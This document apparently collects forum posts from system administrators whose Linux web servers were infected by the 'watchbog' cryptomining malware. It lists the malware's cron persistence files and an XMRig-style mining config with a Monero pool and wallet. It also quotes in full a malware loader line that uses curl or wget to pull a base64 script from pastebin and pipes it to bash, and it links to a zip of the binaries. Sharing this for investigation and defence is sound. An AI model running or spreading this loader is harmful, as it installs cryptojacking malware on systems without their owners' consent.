Watchbog cryptomining. Who can get some more info about it? [on hold]

This is a comment on a previous post A process called ./watchbog is mining crypto currency in our server. How do I stop it?

It happened to me in a RHEL 6 system and wanted to share my info in case anyone wants to further investigate.

As previously pointed it stores some info /var/spool/abrt, it may have infected /usr/libexec/abrt-hook-ccpp (dunno for sure)

It edits root crontab and creates some cron files as well. The path of cron files:

/etc/cron.hourly/oanacrone /etc/cron.daily/oanacrone /etc/cron.monthly/oanacrone /etc/cron.d/apache /etc/cron.d/root /etc/cron.d/system 

Full content of the cron files: https://pastebin.com/raw/aWKzdq61

Zip file with binaries: https://wetransfer.com/downloads/c56efdeee48cffb2c831ddc274b2497b20190114220026/26a0f790716a7dd8a6afb2978310f3e320190114220026/05e18f

New Linux virus “watchbog”. What could be the cause?

this question had already been brought up here, but was poorly answared with generic answers, like reinstall everything and no actual solution and cause.

So heres my story: There is a new virus out there which creates a proccess called “WATCHBOG” and eats all CPU from the server, after further investigation, i found out that this virus is mining cryptocurrency.

Full story:

Server specs: OS: Ubuntu server 16.04.5 LTS Software: Apache2 with virtualhosts, MYSQL, PHP5.6, PHP7

When i found out that this web-server is infected, web pages still worked but awfully slow. So the first thing i see is watchbog process which eats all CPU, so i tried to kill it but it reapears instantly, and everything is so slow that it is almost impossible to operate the server. Next what i thought- “ok i need to terminate this process” So i thought i will put “* * * * * killall watchbog” in crontab , so i opened crontab, and found out that its compromised as well, so i removed this new entry from crontab, i deleted the watchbog file, and after a minute or two everything magically reappeared. Crontab got compromised again to run some kind of remote script and the watchbog process was up and eating cpu again.

I tried to find anything usefull on the web, and found these articles:

Heres is the most helpfull one: https://sudhakarbellamkonda.blogspot…50061219193777

After following this article the watchbog virus still reappeared So i came up with this solution: open a screen session as root and then run this loop: ( while true ; do killall watchbog ; done ) and leave it running in background by detaching screen session with CTRL+A+D. I posted as well this solution in that blog. and here is one other post, but nothing really is helpful there
https://unix.stackexchange.com/questions/487437/a-strange-process-called-watchbog-is-hogging-my-entire-cpu-and-i-cant-get-rid

So i tried fighting this virus many ways, changed passwords, reinstalled SSH, e.t.c. and no luck Meanwhile i created a new Ubuntu server with the latest 18.04.1 LTS We installed all latest webserver stuff, enabled UFW, opened web and ftp ports. then migrated WWW data and SQL, changed IP back to original servers IP, and….. there it is AGAIN The virus came back on the new machine so i think probably this virus infects the system by using some vulnerability in web-server software, So we found out that WGET and CURL is responsible for distributing the virus around the system, now we are trying to understand how it got there.

If you have any tips, please help find the vulnerability.

P.S. This is my first question, judge me softly please 🙂

a process called ./watchbog is mining crypto currency in our server. how do i stop it?

I have found this question here but I have some more clarification that’s why I am writing again.

I have a process called “watchbog” that is completely hogging my CPU and I don't know what it is

So I did some digging, and found that an executable is being run from the /tmp directory. The folder structure is something like this,

/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data 

In that folder there are two files, one executable watchbog which is actually being run and one config.json. This is the content of the config file,

{     "algo": "cryptonight",     "api": {         "port": 0,         "access-token": null,         "id": null,         "worker-id": null,         "ipv6": false,         "restricted": true     },     "asm": true,     "autosave": true,     "av": 0,     "background": true,     "colors": true,     "cpu-affinity": null,     "cpu-priority": 3,     "donate-level": 1,     "huge-pages": false,     "hw-aes": null,     "log-file": null,     "max-cpu-usage": 100,     "pools": [         {             "url": "pool.minexmr.com:443",             "user": "4AbjKdQkedGZXvzm6VxMJb1zLB2CAmCmXdoCisRsQFAUPs4TWFePDUcZzk5ui4EdZXT3uaXXtssqPCoKQPTz7PeZNkKASkm.old",             "pass": "x",             "rig-id": null,             "nicehash": false,             "keepalive": true,             "variant": -1,             "tls": false,             "tls-fingerprint": null         }     ],     "print-time": 60,     "retries": 5,     "retry-pause": 5,     "safe": false,     "threads": [         {             "low_power_mode": 1,             "affine_to_cpu": false,             "asm": true         },         {             "low_power_mode": 1,             "affine_to_cpu": false,             "asm": true         }     ],     "user-agent": null,     "syslog": false,     "watch": false } 

But deleting the folders is not helping, they are being recreated withing few seconds. So I tried to see what other process are running and I found these

solr     32616  0.0  0.0   4504   780 ?        Ss   13:10   0:00 /bin/sh -c (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- h solr     32618  0.0  0.0  11224  2924 ?        S    13:10   0:00 bash solr     32623  0.2  0.0  11644  3376 ?        S    13:10   0:00 /bin/bash solr     32656  200  0.1 270204  6996 ?        Ssl  13:10   0:26 ./watchbog 

The pastebin url points to another shell command with another shell command with another pastebin url.

(curl -fsSL https://pastebin.com/raw/nMrfmnRa||wget -q -O- https://pastebin.com/raw/nMrfmnRa) | base64 -d | /bin/bash 

This second pastebin url points to a base64 encoded shell script. I can’t include it here due to character limitation. Here is the link https://pastebin.com/raw/nMrfmnRa

I am no expert in this field, but it looks like the script is setting a cron job which downloads the executable again.

This is all I could find on my own, can anyone please guide as to how I can stop this whole thing or would I have to redeploy the server again?